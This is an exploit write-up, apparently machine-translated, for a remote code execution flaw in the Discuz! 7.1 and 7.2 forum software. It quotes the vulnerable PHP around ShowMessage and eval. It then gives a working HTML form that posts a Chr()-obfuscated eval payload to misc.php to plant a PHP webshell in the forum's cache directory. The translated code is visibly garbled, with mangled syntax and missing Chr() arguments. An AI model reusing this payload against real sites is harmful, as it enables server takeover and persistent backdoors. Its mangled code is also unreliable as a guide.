discuz! 7.1 & 7.2 Remote Code Execution vulnerability

Affected Products:

discuz! 7.1 & 7.2

Vulnerability Description:

The $scriptlang array that generated the vulnerability was initialized after the plug-in was installed discuz! The parameters executed in eval in the ShowMessage function in the new version 7.1 and 7.2 are uninitialized and can be arbitrarily committed, allowing arbitrary PHP commands to be executed. The following analysis of this remote code execution vulnerability, this problem is really serious, you can write directly to the shell: first, the vulnerability from the ShowMessage functions: function ShowMessage ($message, $url _forward = ", $extra = ", $forwardtype = 0) {Extract ($GLOBALS, extr_skip);//dangerous usage, uninitialized variables can be directly brought into the function, directly resulting in the problem, from Www.oldjun.com Globa L $hookscriptmessage, $extrahead, $discuz _uid, $discuz _action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $     CharSet, $show _message, $inajax, $_dcache, $advlist;     Define (' Cache_forbidden ', TRUE);     $hookscriptmessage = $show _message = $message; $messagehandle = 0;     $msgforward = unserialize ($_dcache[' Settings ' [' Msgforward ']);     $refreshtime = Intval ($msgforward [' refreshtime ']); $refreshtime = Empty ($forwardtype)?     $refreshtime: ($refreshtime? $refreshtime: 3);     $msgforward [' refreshtime '] = $refreshtime * 1000; $url _forward = Empty ($url _forward)? ': (Empty ($_dcookie[' Sid ') && $transsidstatus? Transsid ($url _forward): $url _forward);     $seccodecheck = $seccodestatus & 2; if ($_dcache[' Settings ' [' Funcsiteid '] && $_dcache[' Settings ' [' Funckey '] && $funcstatinfo & &!is_robot) {$statlogfile = Discuz_root.         /forumdata/funcstat.log ';             if ($fp = @fopen ($statlogfile, ' a ')) {@flock ($fp, 2);                 if (Is_array ($funcstatinfo)) {$funcstatinfo = Array_unique ($funcstatinfo); foreach ($funcstatinfo as $funcinfo) {fwrite ($fp, Funcstat_query ($funcinfo, $message). "                 \ n "); }} else {fwrite ($fp, Funcstat_query ($funcstatinfo, $message). "             \ n ");             } fclose ($FP);         $funcstatinfo = $GLOBALS [' funcstatinfo '] = '; }} if (!defined (' stat_disabled ') && stat_id > 0 &&!is_robot) {write_statlog ($message)     ; if ($url _forward && (!empty ($quickforward) | | empty ($INAJAX) && $msgforward[' Quick ' && $msgforward [' Messages '] && @in_array ($message, $msgforward [' Messages '])) {         Updatesession ();     Dheader ("Location:". Str_replace (' & ', ' & ', $url _forward));         if (!empty ($infloat)) {if ($extra) {$messagehandle = $extra;     } $extra = ';     } if (In_array ($extra, Array (' halted ', ' noperm '))) {$discuz _action = 254;     } else {$discuz _action = 255;     } Include language (' messages '); $vars = Explode (': ', $message);//As long as it contains: it can be if (count ($vars) = = 2 && isset ($scriptlang [$vars [0]][$vars [1]]) {//Two A number can be used: Split eval ("\ $show _message = \" ". Str_replace ('" ', ' \ "', $scriptlang [$vars [0]][$vars [1]])." \";");/ /$scriptlang uninitialized, can be customized from www.oldjun.com} elseif (Isset ($language [$message])) {$pre = $inajax?         ' Ajax_ ': '; Eval ("\ $show _message = \" ". ( Isset ($language [$pre. $message])? $language [$pre. $message]: $language [$message]). " \";");         Unset ($pre); }     ......} Second, the Global Mechanism of DZ causes uninitialized parameters to be arbitrarily committed: foreach (Array (' _cookie ', ' _post ', ' _get ') as $_request) {foreach ($$_request as $_key =     $_value) {$_key{0}! = ' _ ' && $$_key = daddslashes ($_value);          }} Three, misc.php just have a point that can customize the message, but it is also uninitialized: elseif ($action = = ' imme_binding ' && $discuz _uid) {if (Isemail ($id)) {         $msn = $db->result_first ("Select MSN from {$tablepre}memberfields WHERE uid= ' $discuz _uid '");         $msn = explode ("\ t", $msn);         $id = Dhtmlspecialchars (substr ($id, 0, Strpos ($id, ' @ '));         $msn = "$msn [0]\t$id";         $db->query ("UPDATE {$tablepre}memberfields SET msn= ' $msn ' WHERE uid= ' $discuz _uid '");     ShowMessage (' msn_binding_succeed ', ' memcp.php ');         } else {if ($result = = ' declined ') {Dheader ("Location:memcp.php");  } else {showmessage ($response [' result ']);//$response not initialized, can be customized from www.oldjun.com}}}

Test method:the site provider (method) may be offensive, only for security research and teaching purposes, at your own risk!

2. in the ShowMessage function $vars = explode(': ', $message), and the message can be controlled by itself, So it's easy, the arguments are two custom arrays.
6. Here is the HTML test code:
10. <form Method="POST" action="Http://bbs." xxxx.com/misc.php " enctype=" Multipart/form-data ">
12. Post ID, specify an existing post to:<input type="text" name="tid" value="1 " />
14. <input type="hidden" name="Action" value="imme_binding" />
16. <input type="hidden" name="Response[result]" value="1:2" />
17. <input type= "hidden" Name= " SCRIPTLANG[1][2] " Value=" ${${eval (Chr (102). Chr. chr ( 117). Chr (() Chr (102). CHR (111). chr (102) CHR (101). Chr (a) Chr (+). Chr (a 111). Chr (A.). Chr (117). CHR (109). chr (the "CHR"). Chr (the "CHR"). Chr (the "CHR"). Chr (the "the"). Chr (104). CHR (101) . chr. chr (117). CHR (101). Chr (103). CHR (111). CHR (117). chr (the. chr). Chr (for the (), Chr (.) ( (a). Chr (104) Chr (() CHR). chr (the "CHR"). Chr. chr (119). Chr (The) Chr. Chr. Chr (a) (a) (+ 60). ). Chr. chr (104). CHR (101). Chr (118). Chr (() Chr (108). Chr (a) Chr (a). Chr (80). Chr (+) (+) ). chr (CHR). Chr. chr (109). chr (the "CHR"). Chr (the "()") Chr. Chr (the "()). Chr (the" CHR ") (the 41). CHR)}} " />
19. <input type="Submit" name="Topicsubmit" value="Commit" class= "Submit" />
21. </form>
25. forumdata/Cache/usergroup_01. PHP cmd generated in a sentence

discuz! 7.1 & 7.2 Remote Code Execution vulnerability